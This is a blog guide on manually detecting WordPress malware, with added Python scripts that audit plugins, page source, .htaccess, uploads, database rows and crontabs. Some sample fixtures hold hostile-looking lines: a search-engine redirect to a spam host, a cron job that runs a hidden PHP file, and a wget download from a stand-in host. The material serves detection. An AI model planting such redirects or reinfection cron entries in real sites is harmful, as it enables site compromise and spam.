How to Detect WordPress Malware Before It Ruins Your Business

MD Pabel March 2, 2026

Quick Summary: Finding the Invisible Hack

The Core Problem: Hackers no longer break your site visually. They want your site to look normal to you while they steal your traffic, hijack your customers, or send out spam. Learning how to detect WordPress malware manually is the only way to protect your business.

The Symptoms: Sudden drops in SEO traffic, complaints from mobile users, weird pop-ups, or Google Blacklist warnings.

The Process: Automated tools are not enough. You must combine frontend scanners, deep server-level audits, database scrubbing, and visual file comparisons to find hidden backdoors.

The Tools You Need: FTP access (or a File Manager), phpMyAdmin (database access), Google Chrome Developer Tools, and a reliable security plugin.

Every single day, I get emails from business owners asking the exact same question: “Pabel, my traffic is dropping and my customers are complaining about spam, but my site looks fine to me. Exactly how do I know if I am hacked?”

If you are asking how to detect WordPress malware, you are already one step ahead of most website owners. Hackers today are financially motivated. They do not want to deface your website with a scary skull and crossbones. That alerts you to the problem. Instead, they write stealthy code that hides from you while secretly redirecting your search engine traffic to illegal casinos, pharmacies, or phishing pages.

After manually cleaning and restoring more than 4,500 hacked WordPress websites, I have developed a foolproof forensic audit process. Automated security plugins are great, but they often miss the smartest infections.

If you want to know how to detect WordPress malware like a professional security expert, follow this exact 11-step manual auditing guide.


Phase 1: The Automated Surface Scans

When figuring out how to detect WordPress malware, we always start with the easiest, fastest checks. These automated tools will catch the obvious, surface-level infections before we dig into the server.

1. Run a Frontend Scan with Sucuri SiteCheck

Your first step is to use a free online scanner like sitecheck.sucuri.net. This tool behaves like a regular visitor to your website. It does not look at your server files; it only looks at the final code that your site renders on the screen.

This is highly effective for finding frontend malware. If a hacker has injected malicious scripts into your active theme, your core files, or your database, and that script executes in the visitor’s browser, Sucuri will flag it. It is the quickest way to see what your website is actively serving to the public.


2. Check Blacklists Using VirusTotal

Sometimes, the malware is conditional and hides from Sucuri. However, if your site has been infected for a while, global security authorities might have already caught it. Go to VirusTotal.com and paste your domain URL.

VirusTotal runs your domain against over 70 different antivirus engines and website blacklists (including Google Safe Browsing, McAfee, and Norton). If two or three of these engines flag your site as malicious, it is a massive red flag that you have a hidden infection.


3. Run a Sensitive Scan with Wordfence

Online scanners cannot see inside your server. For that, you need an internal tool. Install the free version of the Wordfence plugin. However, the default scan settings are not enough when you are learning how to detect WordPress malware.

Go to the Wordfence scan options and switch the scan type to “High Sensitivity.” Furthermore, check the boxes to scan files outside your WordPress installation and to scan image files as if they were executable. This deep scan takes longer, but it will detect the majority of common PHP backdoors and Base64 encoded payloads hiding in your system.



Phase 2: How to Detect WordPress Malware Hiding in Your Dashboard

Hackers know that you check your WordPress dashboard regularly. To survive, they have developed clever tricks to hide their malicious assets right under your nose. Here is how to detect WordPress malware that is actively lying to you.

4. The “Math Trick” for Finding Hidden Plugins

As I mentioned in many of my case studies, roughly 70% of the hacked sites I clean involve fake hidden plugins. Hackers upload a malicious plugin to your server, but they add a line of PHP code that completely hides it from your “Installed Plugins” list in the dashboard.

To find them, you must do a simple counting exercise:

  1. Log into your WordPress Dashboard and count the exact number of plugins listed on the plugins page. Let’s say you count 15.
  2. Log into your web hosting File Manager or use an FTP client like FileZilla. Navigate to the wp-content/plugins/ directory.
  3. Count the physical folders.

If you have 15 plugins in the dashboard, but you count 16 physical folders on the server, you have just found your malware. Delete the rogue folder immediately.
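
The counting exercise above can be scripted; this is an added example, not code from the original article. It lists every folder and top-level PHP file in the plugins directory, reads the `Plugin Name:` header each one declares, and reports anything missing from the names you copied off the dashboard. The function names, plugin names and temporary directory are constructed for illustration.

```python
import os
import re
import tempfile

# Matches the "Plugin Name:" line of a WordPress plugin header comment.
HEADER = re.compile(rb"^[ \t/*#@]*Plugin Name:\s*(.+)$", re.MULTILINE | re.IGNORECASE)

def plugin_name(php_path):
    """Return the declared plugin name from the first 8 KB of a PHP file, or None."""
    with open(php_path, "rb") as fh:
        match = HEADER.search(fh.read(8192))
    return match.group(1).strip().decode("utf-8", "replace") if match else None

def plugins_on_disk(plugins_dir):
    """Map every folder and top-level PHP file to the plugin name it declares."""
    found = {}
    for entry in sorted(os.listdir(plugins_dir)):
        path = os.path.join(plugins_dir, entry)
        if os.path.isdir(path):
            php_files = [os.path.join(path, f) for f in sorted(os.listdir(path))
                         if f.endswith(".php") and os.path.isfile(os.path.join(path, f))]
            found[entry] = next((n for n in map(plugin_name, php_files) if n), None)
        elif entry.endswith(".php") and entry != "index.php":
            found[entry] = plugin_name(path)
    return found

def unlisted_plugins(plugins_dir, dashboard_names):
    """Return on-disk entries whose name is absent from the dashboard list."""
    listed = {name.strip().lower() for name in dashboard_names}
    return {entry: name for entry, name in plugins_on_disk(plugins_dir).items()
            if name is None or name.lower() not in listed}

def build_sample(root):
    """Constructed sample data: three plugin folders plus the stock index.php."""
    for folder, title in [("contact-form", "Contact Form"), ("seo-tools", "SEO Tools"),
                          ("wp-cache-helper", "Cache Helper")]:
        os.makedirs(os.path.join(root, folder))
        with open(os.path.join(root, folder, folder + ".php"), "w") as fh:
            fh.write("<?php\n/*\n * Plugin Name: %s\n */\n" % title)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php // Silence is golden.\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        # The dashboard (constructed) lists only two of the three folders.
        print(unlisted_plugins(root, ["Contact Form", "SEO Tools"]))
```

An entry reported with the name `None` is a folder that contains no plugin header at all, which is also worth opening.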


5. Hunt Down Invisible “Ghost” Admin Users

Just like plugins, hackers will create new Administrator accounts so they can log back into your site whenever they want. And just like plugins, they will use code to hide these users from your “All Users” list in the dashboard.

To detect user accounts created by an attacker, you must check the database directly. Open phpMyAdmin from your hosting control panel. Find your database and click on the wp_users table (your prefix might be different, like xyz_users).

Look at the list of registered users in the database and compare it to the list in your WordPress dashboard. If you see strange email addresses or usernames in the database that do not exist in the dashboard, a hacker has compromised your site.



Phase 3: How to Detect WordPress Malware Using Your Browser

Sometimes, the best way to find an infection is to look at exactly what your web browser is downloading when it visits your site.

6. Inspect the Raw Source Code

Open your website in Google Chrome, right-click anywhere on the page, and select “View Page Source.” This opens a new tab showing the raw HTML of your website.

You do not need to be an expert coder to spot something suspicious. Scroll to the very bottom (right before the closing </html> tag) and the very top (inside the <head> tags). Look for massive blocks of unreadable, scrambled text (Base64 encoding) or strange links to websites selling pharmaceuticals, cryptocurrency, or foreign language products. If you see links in the source code that are not visible on the actual webpage, you are hacked.


7. Monitor the Browser Network Tab

Modern malware often pulls malicious scripts from external servers. You can catch this behavior using Developer Tools.

Right-click on your website, select “Inspect,” and click on the “Network” tab. Refresh your page. You will see a waterfall list of every single file, image, and script your website is loading. Look at the “Domain” column. You should only see your domain name, Google (for analytics/fonts), and maybe a few trusted third-party tools (like Facebook or a chat widget). If you see the browser downloading scripts from bizarre, random domain names, your site is infected with a redirector or a crypto-miner.
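
The source-code and Network tab checks in steps 6 and 7 can be approximated on a saved copy of the page; this is an added example, not code from the original article. It parses the HTML, reports script and iframe hosts that are neither your own domain nor on your trusted list, and counts inline scripts that contain a long Base64-looking run. The host names, the 200-character threshold and the sample page are assumptions constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")  # long unbroken encoded run

class SourceAudit(HTMLParser):
    """Collect off-site script/iframe hosts and inline scripts with long encoded runs."""
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = [h.lower() for h in allowed_hosts]
        self.unknown_hosts = set()
        self.encoded_scripts = 0
        self._script_text = None  # a list while inside <script>, otherwise None

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag in ("script", "iframe") and src:
            host = urlparse(src).hostname  # None for relative (same-site) URLs
            if host and not any(host == a or host.endswith("." + a) for a in self.allowed):
                self.unknown_hosts.add(host)
        if tag == "script":
            self._script_text = []

    def handle_data(self, data):
        if self._script_text is not None:
            self._script_text.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_text is not None:
            if BASE64_RUN.search("".join(self._script_text)):
                self.encoded_scripts += 1
            self._script_text = None

def audit_source(html, site_host, trusted_hosts):
    """Return (sorted unknown hosts, count of inline scripts with encoded runs)."""
    parser = SourceAudit([site_host] + list(trusted_hosts))
    parser.feed(html)
    parser.close()
    return sorted(parser.unknown_hosts), parser.encoded_scripts

# Constructed sample page: same-site script, trusted script, unknown script, encoded blob.
SAMPLE = ('<html><head><script src="/wp-includes/js/jquery/jquery.min.js"></script>'
          '<script src="https://www.googletagmanager.com/gtag/js?id=G-TEST"></script>'
          '<script src="//cdn-stat-x7.example/l.js"></script></head><body><p>Welcome</p>'
          '<script>var p = "%s";</script></body></html>' % ("QUJD" * 60))

if __name__ == "__main__":
    print(audit_source(SAMPLE, "shop.example", ["googletagmanager.com"]))
```

A static parse only sees tags present in the delivered HTML, so scripts injected at runtime still have to be caught in the Network tab.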



Phase 4: Deep Server and Database Auditing

If the surface-level checks come back clean, but you are still losing traffic, we have to dig deep. This is how to detect WordPress malware at the root level.

8. Audit Your Core System Files

Hackers love to hijack the files that control how your server operates. You need to open your File Manager and inspect these specific files:

  • The .htaccess file: This file controls traffic routing. If you open it and see hundreds of lines of code mentioning RewriteCond %{HTTP_REFERER} or targeting search engines like Google and Bing, you have SEO redirect malware.
  • The wp-config.php file: This file connects your site to your database. Hackers will sometimes place malicious include() or eval() functions at the very top of this file to ensure their malware loads before WordPress even starts.
  • WordPress Core Files: Files like index.php, wp-blog-header.php, and wp-load.php should never be modified. If the “Last Modified” date on these files is recent, they have been compromised.
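
One way to automate the .htaccess check from the first bullet, as an added example rather than code from the original article: it pairs each RewriteCond on HTTP_REFERER or HTTP_USER_AGENT that names a search engine with the RewriteRule it guards, and reports rules that redirect to a different host. The function name, the engine names beyond Google and Bing, and the hosts in the sample file are assumptions.

```python
import re
from urllib.parse import urlparse

COND = re.compile(r"^\s*RewriteCond\s+%\{(HTTP_REFERER|HTTP_USER_AGENT)\}\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
# Assumption: engine names to look for; the article names Google and Bing.
ENGINES = re.compile(r"google|bing|yahoo|yandex|baidu|duckduckgo", re.I)

def audit_htaccess(text, site_host):
    """Flag RewriteRules that send search-engine referrers or crawlers to another host."""
    findings, pending = [], []
    for number, line in enumerate(text.splitlines(), start=1):
        cond = COND.match(line)
        if cond and ENGINES.search(cond.group(2)):
            pending.append((number, cond.group(1).upper()))
            continue
        rule = RULE.match(line)
        if rule:
            host = urlparse(rule.group(1)).hostname  # None for local targets
            if pending and host and host != site_host.lower():
                findings.append({"rule_line": number, "target_host": host,
                                 "conditions": pending})
            pending = []  # RewriteCond lines only apply to the next RewriteRule
    return findings

# Constructed sample: an injected redirect block above the stock WordPress rules.
SAMPLE = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot) [NC]
RewriteRule ^(.*)$ http://pills-offer.example/in.php?u=$1 [R=302,L]
# BEGIN WordPress
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
"""

if __name__ == "__main__":
    for finding in audit_htaccess(SAMPLE, "shop.example"):
        print(finding)
```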

9. Search for Rogue PHP Files in the Uploads Folder

Your wp-content/uploads/ folder is designed exclusively for media. It should only contain images (JPG, PNG, WebP), PDFs, SVGs, or maybe audio files.

There should never be a .php file inside your uploads folder.

Hackers use the media uploader to sneak PHP web shells into your system. Once uploaded, they can use this script to control your server remotely. Open your uploads directory and use the search function to look for .php. If you find a PHP file hiding among your images, you have found a critical backdoor.
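
The uploads search can be scripted so it also catches what a filename search misses; this is an added example, not code from the original article. It walks the uploads tree and flags files with a PHP extension as well as media files that contain a PHP opening tag, which is the same idea as scanning image files as if they were executable. The extensions other than .php and the sample tree are assumptions constructed for the example.

```python
import os
import re
import tempfile

# Assumption: extensions commonly mapped to the PHP handler; the article only names .php.
PHP_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)
PHP_TAG = re.compile(rb"<\?php", re.I)

def scan_uploads(uploads_dir):
    """Return {relative path: reason} for files that do not belong in uploads."""
    findings = {}
    for folder, _dirs, files in os.walk(uploads_dir):
        for name in files:
            path = os.path.join(folder, name)
            rel = os.path.relpath(path, uploads_dir).replace(os.sep, "/")
            if PHP_EXT.search(name):
                findings[rel] = "PHP extension"
                continue
            with open(path, "rb") as fh:
                if PHP_TAG.search(fh.read()):
                    findings[rel] = "PHP tag inside a media file"
    return findings

def build_uploads_sample(root):
    """Constructed sample tree; the 'PHP' here is an inert marker, not a working script."""
    files = {
        "2026/02/logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
        "2026/02/invoice.pdf": b"%PDF-1.4\n%%EOF\n",
        "2026/03/cache.php": b"<?php // constructed marker\n",
        "2026/03/thumb.php.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
        "2026/03/banner.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"<?php /* marker */ ?>",
    }
    for rel, data in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_uploads_sample(root)
        for rel, reason in sorted(scan_uploads(root).items()):
            print(rel, "->", reason)
```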

10. Deep Scan the Database for Malicious Payloads

Next, we must check the database for injected spam. Hackers will hide malicious links or scripts inside your pages and posts using CSS tricks so they are invisible to the human eye, but highly visible to Google’s crawlers.

Log into phpMyAdmin, select your database, and click the “Search” tab. You want to search all of your tables (especially wp_options and wp_posts) for these specific triggers:

  • <script (Look for scripts loading from strange external URLs).
  • position: absolute (Hackers use this to move text off the screen).
  • left: -9999px or right: -9999px (A classic black-hat SEO trick to hide thousands of spam links way off the edge of the monitor).

If your database search returns rows containing these CSS tricks wrapped around links to casinos or adult sites, your database has been successfully breached.
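
Searching for `position: absolute` alone returns many legitimate rows, so it helps to confirm that a match really is a block of links pushed off-screen. The following is an added example, not code from the original article: it takes rows exported from the search and reports only those where links sit inside an element styled with a large negative left or right offset. The class and function names, row ids and link hosts are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

OFFSCREEN = re.compile(r"\b(left|right)\s*:\s*-\d{3,}px", re.I)
VOID = {"br", "img", "hr", "input", "meta", "link"}

class HiddenLinkFinder(HTMLParser):
    """Collect hosts of links nested inside an element pushed off-screen by inline CSS."""
    def __init__(self):
        super().__init__()
        self.depth = 0  # nesting depth inside the off-screen element, 0 = outside
        self.hosts = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in VOID:
            return
        if self.depth:
            self.depth += 1
        elif OFFSCREEN.search(attrs.get("style") or ""):
            self.depth = 1
        if tag == "a" and self.depth:
            host = urlparse(attrs.get("href") or "").hostname
            if host:
                self.hosts.append(host)

    def handle_endtag(self, tag):
        if self.depth and tag not in VOID:
            self.depth -= 1

def scan_rows(rows):
    """rows: (table, row id, text). Return the rows that carry off-screen links."""
    flagged = []
    for table, row_id, text in rows:
        finder = HiddenLinkFinder()
        finder.feed(text)
        finder.close()
        if finder.hosts:
            flagged.append((table, row_id, finder.hosts))
    return flagged

# Constructed rows, as they might come back from a search of wp_posts and wp_options.
SAMPLE_ROWS = [
    ("wp_posts", 12, '<p>Our opening hours are 9 to 5.</p>'),
    ("wp_posts", 31, '<p>Sale!</p><div style="position:absolute; left:-9999px">'
                     '<a href="http://casino-bonus.example/">slots</a><br></div>'),
    ("wp_options", 204, '<div style="position: absolute; top: 0"><a href="/cart">Cart</a></div>'),
]
```

Calling `scan_rows(SAMPLE_ROWS)` reports row 31 only; row 204 uses `position: absolute` for an ordinary on-screen element and is left alone.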


11. Inspect Cron Jobs for Auto-Reinfection Malware

If you keep cleaning your site but the virus comes back every morning at 2:00 AM, you are dealing with a scheduled task. Knowing how to detect WordPress malware inside cron jobs is crucial for permanent removal.

Hackers inject malicious cron jobs into your WordPress system to automatically reinstall backdoors. To find them, install the free WP Crontrol plugin. Go to Tools > Cron Events. Look for scheduled tasks with bizarre, random names (like wp_auto_update_xyz or random strings of letters) that execute suspicious PHP functions like eval() or base64_decode().

Additionally, log into your hosting control panel (like cPanel) and check the server-level “Cron Jobs” section. If you see a command executing a hidden .php file or downloading a script via wget or curl, delete it immediately. That is the engine driving the reinfection.
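
The server-level cron check can be run against a saved copy of the crontab; this is an added example, not code from the original article. It flags entries that run a .php file from a dot-prefixed (hidden) path and entries that use wget or curl against a host other than your own, so the common job that requests your own wp-cron.php is not reported. The function names, paths and hosts are constructed for illustration.

```python
import re
from urllib.parse import urlparse

FETCH = re.compile(r"\b(wget|curl)\b")
URL = re.compile(r"https?://[^\s'\"]+")
# A path component that starts with "." (but is not "." or "..") in a path ending in .php.
HIDDEN_PHP = re.compile(r"(?:^|[\s/'\"])\.[^\s/.]\S*?\.php\b", re.I)

def split_entry(line):
    """Return (schedule, command), or None for comments, blanks and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = 1 if line.startswith("@") else 5  # @daily etc. use a single schedule field
    parts = line.split(None, fields)
    if len(parts) <= fields:
        return None
    return " ".join(parts[:fields]), parts[fields]

def audit_crontab(text, site_host):
    """Return [(line number, schedule, reasons)] for entries worth reviewing."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        reasons = []
        if HIDDEN_PHP.search(command):
            reasons.append("runs hidden .php file")
        if FETCH.search(command):
            hosts = {urlparse(u).hostname for u in URL.findall(command)}
            if not hosts or hosts - {site_host}:
                reasons.append("downloads from another host")
        if reasons:
            findings.append((number, schedule, reasons))
    return findings

# Constructed crontab for a site hosted at shop.example.
SAMPLE = """MAILTO=owner@shop.example
*/15 * * * * curl -s https://shop.example/wp-cron.php?doing_wp_cron >/dev/null
0 2 * * * /usr/bin/php /home/shop/public_html/wp-content/uploads/.cache/.sess.php
@daily wget -q -O /tmp/u.txt http://update-node.example/u.txt
30 3 * * 0 /usr/local/bin/backup.sh
"""

if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE, "shop.example"):
        print(finding)
```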


You Found the Malware. What Now?

Learning how to detect WordPress malware is only the first half of the battle. Removing it permanently is a highly technical, high-stakes operation. If you simply delete the malicious code you found without closing the backdoor vulnerability, automated bots will reinfect your website in less than 24 hours.

A proper cleanup requires replacing core files, safely dropping infected database rows, purging server-level caches, auditing cron jobs, and hardening your security perimeter to block future attacks.

If you have followed this guide and discovered that your business website is compromised, you do not have to fix it alone. One wrong click in your database or server files can break your website entirely.

I can take the stress off your shoulders today. Request my professional WordPress malware removal service. I will manually perform a deep forensic audit, surgically extract every hidden backdoor, scrub your database, and lock down your server so you can get back to running your business with peace of mind.

About the Author

MD Pabel

MD Pabel is the Founder and CEO of 3Zero Digital, a leading agency specializing in custom web development, WordPress security, and malware removal. With 8+ years of experience, he has completed 3200+ projects, served 2300+ clients, and resolved 4500+ cases of malware and hacked websites.